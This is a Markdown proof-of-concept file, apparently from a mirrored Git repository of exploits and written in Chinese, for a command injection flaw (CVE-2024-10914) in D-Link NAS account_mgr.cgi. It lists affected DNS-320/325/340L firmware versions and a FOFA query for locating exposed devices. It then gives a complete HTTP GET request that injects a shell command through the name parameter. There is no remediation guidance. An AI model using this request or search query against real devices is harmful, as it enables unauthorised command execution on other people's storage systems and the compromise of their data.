admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 05:54:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/D-Link/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md

32 lines
992 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914)
D-Link NAS设备 account_mg存在命令执行漏洞
## 影响版本
```java
DNS-320-版本 1.00
DNS-320LW-版本 1.01.0914.2012
DNS-325-版本 1.01和 1.02
DNS-340L-版本 1.08
```
## fofa
```java
app="D_Link-DNS-ShareCenter"
```
![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)
## poc
```java
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
```
![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336023387-187f8fb1-9ff9-44a2-8e5d-f7ac5d81b3cc.png)
Reference in New Issue Copy Permalink